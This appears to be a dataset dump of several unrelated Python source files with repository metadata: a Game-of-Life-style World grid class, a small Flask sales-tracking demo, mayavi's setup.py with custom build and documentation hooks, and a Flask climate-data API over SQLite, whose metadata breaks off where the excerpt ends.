seq_id (string) | text (string) | repo_name (string) | sub_path (string) | file_name (string) | file_ext (string) | file_size_in_byte (int64) | program_lang (string) | lang (string) | doc_type (string) | stars (int64) | dataset (string) | pt (string) | api (list)
---|---|---|---|---|---|---|---|---|---|---|---|---|---
36780535651
|
from typing import List, Union, Iterator, Tuple
from cell import Cell
class World:
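# Offsets (dx, dy) of the eight neighbouring cells (Moore neighbourhood).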
NEIGHT = (
(-1, -1),
(-1, 0),
(-1, 1),
(0, -1),
(0, 1),
(1, -1),
(1, 0),
(1, 1)
)
def __init__(self, width, height):
self.w = width
self.h = height
self.cells = self._new_world()
self.new_cells = None
def add_cell(self, x: int, y: int, cell: Cell):
self.cells[y][x] = cell
def _new_world(self) -> List[List[Union[Cell, None]]]:
return [
[None for x in range(self.w)]
for y in range(self.h)
]
def _iter_by(self, cells) -> Iterator[Tuple[int, int, Cell]]:
for y in range(self.h):
for x in range(self.w):
yield x, y, cells[y][x]
def _neight(self, cx, cy) -> Iterator[Cell]:
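# Yield the living neighbours of (cx, cy); coordinates wrap around the edges, so the world behaves like a torus.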
for dx, dy in self.NEIGHT:
x = cx + dx
y = cy + dy
if not (0 <= x < self.w):
x %= self.w
if not (0 <= y < self.h):
y %= self.h
if self.cells[y][x] is not None:
yield self.cells[y][x]
def _neight_count(self, cx, cy) -> int:
return len(tuple(self._neight(cx, cy)))
def step(self):
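# Build the next generation into a fresh grid so that in-step updates do not affect neighbour counts.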
self.new_cells = self._new_world()
for x, y, cell in self._iter_by(self.cells):
neight = self._neight_count(x, y)
if cell is None:
cell = Cell.generate_new(list(self._neight(x, y)), neight)
if (cell is not None) and (not cell.is_birth(neight)):
cell = None
else:
if not cell.is_alive(neight) or cell.is_dead():
cell = None
self.new_cells[y][x] = cell
if cell:
cell.age += 1
self.cells = self.new_cells
def clean(self):
self.cells = self._new_world()
def stats(self):
types = {}
for x, y, cell in self:
if cell is None:
continue
key = tuple(cell.birth), tuple(cell.live)
types.setdefault(key, 0)
types[key] += 1
return types
def print(self):
for y in range(self.h):
for x in range(self.w):
cell = self.cells[y][x]
if cell:
print("#", end="")
else:
print("-", end="")
print()
# print(AsciiTable([[""]] + self.cells).table)
def __iter__(self):
yield from self._iter_by(self.cells)
def __getitem__(self, item: Union[Tuple[int, int]]):
return self.cells[item[1]][item[0]]
|
AzaubaevViktor/evo_life
|
world.py
|
world.py
|
py
| 2,710 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cell.Cell",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "typing.Union",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "typing.Iterator",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "typing.Iterator",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "cell.Cell",
"line_number": 40,
"usage_type": "name"
},
{
"api_name": "cell.Cell.generate_new",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "cell.Cell",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "cell.is_birth",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "cell.is_alive",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "cell.is_dead",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "cell.age",
"line_number": 70,
"usage_type": "attribute"
},
{
"api_name": "cell.birth",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "cell.live",
"line_number": 82,
"usage_type": "attribute"
},
{
"api_name": "typing.Union",
"line_number": 102,
"usage_type": "name"
},
{
"api_name": "typing.Tuple",
"line_number": 102,
"usage_type": "name"
}
] |
71840538747
|
from flask import Flask
from flask import render_template
from flask import Response, request, jsonify
app = Flask(__name__)
current_id = 4
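# In-memory sample data; the app keeps all of its state in these module-level lists.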
sales = [
{
"id": 1,
"salesperson": "James D. Halpert",
"client": "Shake Shack",
"reams": 1000
},
{
"id": 2,
"salesperson": "Stanley Hudson",
"client": "Toast",
"reams": 4000
},
{
"id": 3,
"salesperson": "Michael G. Scott",
"client": "Computer Science Department",
"reams": 10000
},
]
clients = [
"Shake Shack",
"Toast",
"Computer Science Department",
"Teacher's College",
"Starbucks",
"Subsconsious",
"Flat Top",
"Joe's Coffee",
"Max Caffe",
"Nussbaum & Wu",
"Taco Bell",
]
non_ppc_people = [
"Phyllis",
"Dwight",
"Oscar",
"Creed",
"Pam",
"Jim",
"Stanley",
"Michael",
"Kevin",
"Kelly"
]
ppc_people = [
"Angela"
]
@app.route('/infinity')
def infinity(name=None):
return render_template('cu-paper-infinity.html', sales=sales, clients=clients)
@app.route('/ppc')
def ppc(name=None):
return render_template('ppc.html', non_ppc_people=non_ppc_people, ppc_people=ppc_people)
@app.route('/save_sale', methods=['GET', 'POST'])
def save_sale():
global current_id
global sales
global clients
json_data = request.get_json()
salesperson = json_data["salesperson"]
client = json_data["client"]
reams = json_data["reams"]
current_id += 1
new_sale_log = {
"id": current_id,
"salesperson": salesperson,
"client": client,
"reams": reams
}
sales.append(new_sale_log)
if client not in clients:
clients.append(client)
return jsonify(sales=sales, clients=clients)
@app.route('/delete_sale', methods=['GET', 'POST'])
def delete_sale():
global sales
delete_id = request.get_json()
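# Note: the posted value is used as a list index into sales, not matched against a sale's "id" field.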
del sales[delete_id]
return jsonify(sales=sales)
@app.route('/move_to_non_ppc', methods=['GET', 'POST'])
def move_to_non_ppc():
global non_ppc_people
global ppc_people
name = request.get_json()
if name not in non_ppc_people:
non_ppc_people.append(name)
ppc_people.remove(name)
return jsonify(non_ppc_people=non_ppc_people, ppc_people=ppc_people)
@app.route('/move_to_ppc', methods=['GET', 'POST'])
def move_to_ppc():
global non_ppc_people
global ppc_people
name = request.get_json()
if name not in ppc_people:
ppc_people.append(name)
non_ppc_people.remove(name)
return jsonify(non_ppc_people=non_ppc_people, ppc_people=ppc_people)
if __name__ == '__main__':
app.run(debug=True)
|
haoshuai999/User-Interface
|
cu-paper-infinity&ppc/app.py
|
app.py
|
py
| 2,393 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 71,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 71,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 93,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 104,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "flask.request.get_json",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "flask.request",
"line_number": 117,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 123,
"usage_type": "call"
}
] |
30354475241
|
import setuptools
from setuptools import Command
try:
import numpy
from numpy.distutils.command import build, install_data, build_src
from numpy.distutils.core import setup
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
from distutils.command import build, install_data
from distutils.core import setup
import io
import os
import time
import subprocess
import shutil
import re
import sys
import traceback
from os.path import (abspath, basename, dirname, exists, getmtime, isdir,
join, split)
from distutils.command import clean
from distutils import log
from setuptools.command import develop
MODE = 'normal'
if len(sys.argv) >= 2 and \
('--help' in sys.argv[1:] or
sys.argv[1] in ('--help-commands', 'egg_info', '--version',
'clean', 'sdist')):
MODE = 'info'
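# 'info' mode covers metadata-only commands (help, egg_info, --version, clean, sdist); they may run without numpy.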
info = {}
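# Read version and dependency metadata from mayavi/__init__.py without importing the package.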
fname = join('mayavi', '__init__.py')
exec(compile(open(fname).read(), fname, 'exec'), info)
DEFAULT_HTML_TARGET_DIR = join('docs', 'build')
DEFAULT_INPUT_DIR = join('docs', 'source',)
class GenDocs(Command):
description = (
"This command generates generated part of the documentation "
"when needed. It's run automatically before a build_docs, and that's "
"the only time it needs to be run."
)
user_options = [
('None', None, 'this command has no options'),
]
def latest_modified(self, the_path, filetypes='', ignore_dirs=''):
"""Traverses a path looking for the most recently modified file
Parameters
----------
the_path : string
Contains path to be traversed or filename to be inspected.
filetypes : string
Regular expression pattern of files to examine. If specified, other
files are ignored. Otherwise, all files are examined.
ignore_dirs : string
Regular expression pattern of directories to be ignored. If not
specified, all directories are walked.
Returns
-------
latest_time : float
Modification time of latest_path.
latest_path : string
Most recently modified file.
Description
-----------
"""
file_re = re.compile(filetypes)
dir_re = re.compile(ignore_dirs)
if not exists(the_path):
return 0, the_path
if isdir(the_path):
latest_time = 0
latest_path = the_path
for root, dirs, files in os.walk(the_path):
if ignore_dirs != '':
# This needs to iterate over a copy of the list. Otherwise,
# as things get removed from the original list, the indices
# become invalid.
for dir in dirs[:]:
if dir_re.search(dir):
dirs.remove(dir)
for file in files:
if filetypes != '':
if not file_re.search(file):
continue
current_file_time = getmtime(join(root, file))
if current_file_time > latest_time:
latest_time = current_file_time
latest_path = join(root, file)
return latest_time, latest_path
else:
return getmtime(the_path), the_path
def mlab_reference(self):
""" If mayavi is installed, run the mlab_reference generator.
"""
# XXX: This is really a hack: the script is not made to be used
# for different projects, but it ended up being. This part is
# mayavi-specific.
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = 'mayavi'
sources = r'(\.py)|(\.rst)$'
excluded_dirs = r'^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified('mlab_reference.py')[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'mlab_reference.rst'))):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the mlab reference documentation")
os.system('python mlab_reference.py')
except:
pass
def example_files(self):
""" Generate the documentation files for the examples.
"""
mlab_ref_dir = join(DEFAULT_INPUT_DIR, 'mayavi', 'auto')
source_path = join('examples', 'mayavi')
sources = r'(\.py)|(\.rst)$'
excluded_dirs = r'^\.'
target_path = mlab_ref_dir
target_time = self.latest_modified(target_path,
ignore_dirs=excluded_dirs)[0]
script_file_name = join('docs', 'source', 'render_examples.py')
if (self.latest_modified(source_path, filetypes=sources,
ignore_dirs=excluded_dirs)[0] > target_time
or self.latest_modified(script_file_name)[0] > target_time
or not exists(join('docs', 'source', 'mayavi', 'auto',
'examples.rst'))
):
try:
from mayavi import mlab
from mayavi.tools import auto_doc
print("Generating the example list")
subprocess.call('python %s' %
basename(script_file_name), shell=True,
cwd=dirname(script_file_name))
except:
pass
def run(self):
self.mlab_reference()
self.example_files()
def initialize_options(self):
pass
def finalize_options(self):
pass
class BuildDocs(Command):
description = \
"This command generates the documentation by running Sphinx. " \
"It then zips the docs into an html.zip file."
user_options = [
('None', None, 'this command has no options'),
]
def make_docs(self):
if os.name == 'nt':
print("Please impelemnt sphinx building on windows here.")
else:
subprocess.call(['make', 'html'], cwd='docs')
def run(self):
self.make_docs()
def initialize_options(self):
pass
def finalize_options(self):
pass
# Functions to generate the docs
def list_doc_projects():
""" List the different source directories under DEFAULT_INPUT_DIR
for which we have docs.
"""
source_dir = join(abspath(dirname(__file__)),
DEFAULT_INPUT_DIR)
source_list = os.listdir(source_dir)
# Check to make sure we're using non-hidden directories.
source_dirs = [listing for listing in source_list
if isdir(join(source_dir, listing))
and not listing.startswith('.')]
return source_dirs
def list_docs_data_files(project):
""" List the files to add to a project by inspecting the
documentation directory. This works only if called after the
build step, as the files have to be built.
returns a list of (install_dir, [data_files, ]) tuples.
"""
project_target_dir = join(DEFAULT_HTML_TARGET_DIR, project, 'html')
return_list = []
for root, dirs, files in os.walk(project_target_dir, topdown=True):
# Modify inplace the list of directories to walk
dirs[:] = [d for d in dirs if not d.startswith('.')]
if len(files) == 0:
continue
install_dir = root.replace(project_target_dir, join(project, 'html'))
return_list.append((install_dir, [join(root, f) for f in files]))
return return_list
def _tvtk_built_recently(zipfile, delay):
"""Returns True if the TVTK classes in zipfile was built in the last
delay seconds.
"""
if not os.path.exists(zipfile):
return False
ctime = os.stat(zipfile).st_ctime
tdiff = time.time() - ctime
return tdiff < delay
# Our custom distutils hooks
def build_tvtk_classes_zip():
MY_DIR = os.path.dirname(__file__)
zipfile = os.path.join(MY_DIR, 'tvtk', 'tvtk_classes.zip')
if _tvtk_built_recently(zipfile, delay=120):
print("Already built tvtk_classes.zip")
return
else:
print("Building tvtk_classes.zip")
sys.path.insert(0, MY_DIR)
import tvtk
tvtk_dir = 'tvtk'
sys.path.insert(0, tvtk_dir)
from setup import gen_tvtk_classes_zip
gen_tvtk_classes_zip()
sys.path.remove(tvtk_dir)
sys.path.remove(MY_DIR)
class MyBuild(build.build):
""" A build hook to generate the documentation.
We sub-class numpy.distutils' build command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
build_tvtk_classes_zip()
build.build.run(self)
class MyBuildSrc(build_src.build_src):
"""Build hook to generate the TVTK ZIP files.
We do it here also because for editable installs, setup.py build is not
called.
"""
def run(self):
build_tvtk_classes_zip()
build_src.build_src.run(self)
class MyDevelop(develop.develop):
""" A hook to build the TVTK ZIP file on develop.
Subclassing setuptools' command because numpy.distutils doesn't
have an implementation.
"""
def run(self):
# Make sure that the 'build_src' command will
# always be inplace when we do a 'develop'.
self.reinitialize_command('build_src', inplace=1)
# tvtk_classes.zip always need to be created on 'develop'.
build_tvtk_classes_zip()
develop.develop.run(self)
class MyInstallData(install_data.install_data):
""" An install hook to copy the generated documentation.
We subclass numpy.distutils' command because we're relying on
numpy.distutils' setup method to build python extensions.
"""
def run(self):
install_data_command = self.get_finalized_command('install_data')
for project in list_doc_projects():
install_data_command.data_files.extend(
list_docs_data_files(project))
# make sure tvtk_classes.zip always get created before putting it
# in the install data.
build_tvtk_classes_zip()
tvtk_dir = 'tvtk'
install_data_command.data_files.append(
(tvtk_dir, [join(tvtk_dir, 'tvtk_classes.zip')]))
install_data.install_data.run(self)
class MyClean(clean.clean):
"""Reimplements to remove the extension module array_ext to guarantee a
fresh rebuild every time. The module hanging around could introduce
problems when doing develop for a different vtk version."""
def run(self):
MY_DIR = os.path.dirname(__file__)
ext_file = os.path.join(
MY_DIR,
"tvtk",
"array_ext" + (".pyd" if sys.platform == "win32" else ".so")
)
if os.path.exists(ext_file):
print("Removing in-place array extensions {}".format(ext_file))
os.unlink(ext_file)
clean.clean.run(self)
# Configure our extensions to Python
def configuration(parent_package=None, top_path=None):
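# numpy.distutils configuration: declares the tvtk subpackage and the data directories bundled with the build.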
from numpy.distutils.misc_util import Configuration
config = Configuration(None, parent_package, top_path)
config.set_options(
ignore_setup_xxx_py=True,
assume_default_configuration=True,
delegate_options_to_subpackages=True,
quiet=True,
)
config.add_subpackage('tvtk')
config.add_data_dir('mayavi/core/lut')
config.add_data_dir('mayavi/tests/data')
config.add_data_dir('mayavi/tests/csv_files')
config.add_data_dir('mayavi/tools/static')
# Image files.
for pkgdir in ('mayavi', 'tvtk'):
for root, dirs, files in os.walk(pkgdir):
if split(root)[-1] == 'images':
config.add_data_dir(root)
# *.ini files.
config.add_data_dir('tvtk/plugins/scene')
config.add_data_dir('mayavi/preferences')
return config
###########################################################################
# Similar to package_data, but installed before build
build_package_data = {'mayavi.images': ['docs/source/mayavi/_static/m2_about.jpg']}
# Install our data files at build time. This is iffy,
# but we need to do this before distutils kicks in.
for package, files in build_package_data.items():
target_path = package.replace('.', os.sep)
for filename in files:
shutil.copy(filename, target_path)
###########################################################################
# Build the full set of packages by appending any found by setuptools'
# find_packages to those discovered by numpy.distutils.
if HAS_NUMPY:
config = configuration().todict()
else:
# This is just a dummy so the egg_info command works.
config = {'packages': []}
packages = setuptools.find_packages(exclude=config['packages'] +
['docs', 'examples'])
config['packages'] += packages
if MODE != 'info' and not HAS_NUMPY:
msg = '''
Numpy is required to build Mayavi correctly, please install it first.
'''
print('*'*80)
print(msg)
print('*'*80)
raise RuntimeError(msg)
# The actual setup call
if __name__ == '__main__':
setup(
name='mayavi',
version=info['__version__'],
author="Prabhu Ramachandran, et al.",
author_email="[email protected]",
maintainer='ETS Developers',
python_requires='>=3.8',
maintainer_email='[email protected]',
url='http://docs.enthought.com/mayavi/mayavi/',
classifiers=[c.strip() for c in """\
Development Status :: 5 - Production/Stable
Intended Audience :: Developers
Intended Audience :: Science/Research
License :: OSI Approved :: BSD License
Operating System :: MacOS
Operating System :: Microsoft :: Windows
Operating System :: OS Independent
Operating System :: POSIX
Operating System :: Unix
Programming Language :: C
Programming Language :: Python
Topic :: Scientific/Engineering
Topic :: Software Development
Topic :: Software Development :: Libraries
""".splitlines() if len(c.split()) > 0],
cmdclass={
# Work around a numpy distutils bug by forcing the use of the
# setuptools' sdist command.
'sdist': setuptools.command.sdist.sdist,
'build': MyBuild,
'build_src': MyBuildSrc,
'clean': MyClean,
'develop': MyDevelop,
'install_data': MyInstallData,
'gen_docs': GenDocs,
'build_docs': BuildDocs,
},
description='3D scientific data visualization library and application',
download_url=('https://www.github.com/enthought/mayavi'),
entry_points={
'gui_scripts': [
'mayavi2 = mayavi.scripts.mayavi2:main',
'tvtk_doc = tvtk.tools.tvtk_doc:main'
],
'envisage.plugins': [
'tvtk.scene = tvtk.plugins.scene.scene_plugin:ScenePlugin',
'tvtk.scene_ui = tvtk.plugins.scene.ui.scene_ui_plugin:SceneUIPlugin',
'tvtk.browser = tvtk.plugins.browser.browser_plugin:BrowserPlugin',
'mayavi = mayavi.plugins.mayavi_plugin:MayaviPlugin',
'mayavi_ui = mayavi.plugins.mayavi_ui_plugin:MayaviUIPlugin'
],
'tvtk.toolkits': [
'qt4 = tvtk.pyface.ui.qt4.init:toolkit_object',
'qt = tvtk.pyface.ui.qt4.init:toolkit_object',
'wx = tvtk.pyface.ui.wx.init:toolkit_object',
'null = tvtk.pyface.ui.null.init:toolkit_object',
]
},
extras_require=info['__extras_require__'],
include_package_data=True,
install_requires=info['__requires__'],
license="BSD",
long_description=io.open('README.rst', encoding='utf-8').read(),
platforms=["Windows", "Linux", "Mac OS-X", "Unix", "Solaris"],
zip_safe=False,
**config
)
|
enthought/mayavi
|
setup.py
|
setup.py
|
py
| 16,576 |
python
|
en
|
code
| 1,177 |
github-code
|
6
|
[
{
"api_name": "sys.argv",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 31,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "setuptools.Command",
"line_number": 44,
"usage_type": "name"
},
{
"api_name": "re.compile",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 84,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "os.path.getmtime",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "os.path.getmtime",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 117,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 129,
"usage_type": "call"
},
{
"api_name": "os.system",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 144,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 151,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 156,
"usage_type": "call"
},
{
"api_name": "subprocess.call",
"line_number": 163,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "setuptools.Command",
"line_number": 180,
"usage_type": "name"
},
{
"api_name": "os.name",
"line_number": 191,
"usage_type": "attribute"
},
{
"api_name": "subprocess.call",
"line_number": 194,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.path.abspath",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 211,
"usage_type": "call"
},
{
"api_name": "os.listdir",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 228,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 235,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 244,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 244,
"usage_type": "attribute"
},
{
"api_name": "os.stat",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 254,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 255,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 255,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 261,
"usage_type": "attribute"
},
{
"api_name": "sys.path.insert",
"line_number": 264,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 264,
"usage_type": "attribute"
},
{
"api_name": "setup.gen_tvtk_classes_zip",
"line_number": 266,
"usage_type": "call"
},
{
"api_name": "sys.path.remove",
"line_number": 267,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 267,
"usage_type": "attribute"
},
{
"api_name": "sys.path.remove",
"line_number": 268,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 268,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build.build",
"line_number": 271,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build",
"line_number": 271,
"usage_type": "name"
},
{
"api_name": "distutils.command.build.build.run",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "distutils.command.build.build",
"line_number": 281,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.build",
"line_number": 281,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.command.build_src.build_src",
"line_number": 284,
"usage_type": "attribute"
},
{
"api_name": "numpy.distutils.command.build_src",
"line_number": 284,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.command.build_src.build_src.run",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "numpy.distutils.command.build_src.build_src",
"line_number": 293,
"usage_type": "attribute"
},
{
"api_name": "numpy.distutils.command.build_src",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "setuptools.command.develop.develop",
"line_number": 296,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.develop",
"line_number": 296,
"usage_type": "name"
},
{
"api_name": "setuptools.command.develop.develop.run",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "setuptools.command.develop.develop",
"line_number": 312,
"usage_type": "attribute"
},
{
"api_name": "setuptools.command.develop",
"line_number": 312,
"usage_type": "name"
},
{
"api_name": "distutils.command.install_data.install_data",
"line_number": 315,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.install_data",
"line_number": 315,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 334,
"usage_type": "call"
},
{
"api_name": "distutils.command.install_data.install_data.run",
"line_number": 336,
"usage_type": "call"
},
{
"api_name": "distutils.command.install_data.install_data",
"line_number": 336,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.install_data",
"line_number": 336,
"usage_type": "name"
},
{
"api_name": "distutils.command.clean.clean",
"line_number": 339,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.clean",
"line_number": 339,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 344,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 344,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 346,
"usage_type": "attribute"
},
{
"api_name": "sys.platform",
"line_number": 349,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 352,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 352,
"usage_type": "attribute"
},
{
"api_name": "os.unlink",
"line_number": 354,
"usage_type": "call"
},
{
"api_name": "distutils.command.clean.clean.run",
"line_number": 356,
"usage_type": "call"
},
{
"api_name": "distutils.command.clean.clean",
"line_number": 356,
"usage_type": "attribute"
},
{
"api_name": "distutils.command.clean",
"line_number": 356,
"usage_type": "name"
},
{
"api_name": "numpy.distutils.misc_util.Configuration",
"line_number": 362,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 378,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"line_number": 379,
"usage_type": "call"
},
{
"api_name": "os.sep",
"line_number": 396,
"usage_type": "attribute"
},
{
"api_name": "shutil.copy",
"line_number": 398,
"usage_type": "call"
},
{
"api_name": "setuptools.find_packages",
"line_number": 408,
"usage_type": "call"
},
{
"api_name": "distutils.core.setup",
"line_number": 425,
"usage_type": "call"
},
{
"api_name": "setuptools.command",
"line_number": 453,
"usage_type": "attribute"
},
{
"api_name": "io.open",
"line_number": 487,
"usage_type": "call"
}
] |
26602476689
|
import numpy as np
import pandas as pd
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func, inspect
from flask import Flask, jsonify
app = Flask(__name__)
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
Base = automap_base()
Base.prepare(engine, reflect=True)
measurement = Base.classes.measurement
station = Base.classes.station
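# A single module-level session is shared by all of the routes below.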
session = Session(engine)
@app.route("/")
def home():
return (
f"Welcome to Sofie's OFFICIAL Climate App API!<br/>"
f"<br/>"
f"Available Routes are:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/>"
f"/api/v1.0/start (start date must be in mm-dd format) <br/>"
f"/api/v1.0/start/end (start & end dates must be in yyyy-mm-dd format) <br/>"
f"<br/>"
f"May Your Days Be Bright & Sunny, but Your Hair NEVER Frizzy!"
)
@app.route("/api/v1.0/precipitation")
def precipitation():
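# Precipitation for the 12 months preceding the most recent date in the dataset.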
lastDate = session.query(func.max(measurement.date)).all()[0][0]
lastDate = dt.datetime.strptime(lastDate, '%Y-%m-%d')
priorYear = lastDate - dt.timedelta(365)
result = session.query(measurement.date, measurement.prcp).filter(measurement.date>=priorYear).all()
precipitation = []
for date, prcp in result:
precipitation_dict = {}
precipitation_dict["date"] = date
precipitation_dict["prcp"] = prcp
precipitation.append(precipitation_dict)
return jsonify(precipitation)
@app.route("/api/v1.0/stations")
def stations():
results = session.query(station.station,station.name)\
.group_by(station.name)\
.order_by(station.name)\
.all()
stations = list(np.ravel(results))
return jsonify(stations)
@app.route("/api/v1.0/tobs")
def TObs():
lastDate = session.query(func.max(measurement.date)).all()[0][0]
lastDate = dt.datetime.strptime(lastDate, '%Y-%m-%d')
priorYear = lastDate - dt.timedelta(365)
results = session.query(measurement.tobs, measurement.date)\
.filter(measurement.station == 'USC00519281', measurement.date>=priorYear).all()
TObs = list(np.ravel(results))
return jsonify(TObs)
@app.route("/api/v1.0/<start>")
def start(start):
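# <start> is compared as an mm-dd string against the month-day of each measurement (see the note on the index page).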
tmin = func.min(measurement.tobs)
tavg = func.avg(measurement.tobs)
tmax = func.max(measurement.tobs)
sel = [tmin, tavg, tmax]
result = session.query(*sel).filter(func.strftime("%m-%d", measurement.date) >= start).all()
start = []
for tmin, tavg, tmax in result:
start_dict = {}
start_dict["tmin"] = tmin
start_dict["tavg"] = tavg
start_dict["tmax"] = tmax
start.append(start_dict)
return jsonify(start)
@app.route("/api/v1.0/<start>/<end>")
def SnE(start, end):
tmin = func.min(measurement.tobs)
tavg = func.avg(measurement.tobs)
tmax = func.max(measurement.tobs)
sel = [tmin, tavg, tmax]
result = session.query(*sel).filter(measurement.date >= start).filter(measurement.date <= end).all()
end = []
for tmin, tavg, tmax in result:
end_dict = {}
end_dict["tmin"] = tmin
end_dict["tavg"] = tavg
end_dict["tmax"] = tmax
end.append(end_dict)
return jsonify(end)
if __name__ == "__main__":
app.run(debug=True)
|
SofiaAS1/SQLalchemy-Challenge
|
app.py
|
app.py
|
py
| 3,377 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 12,
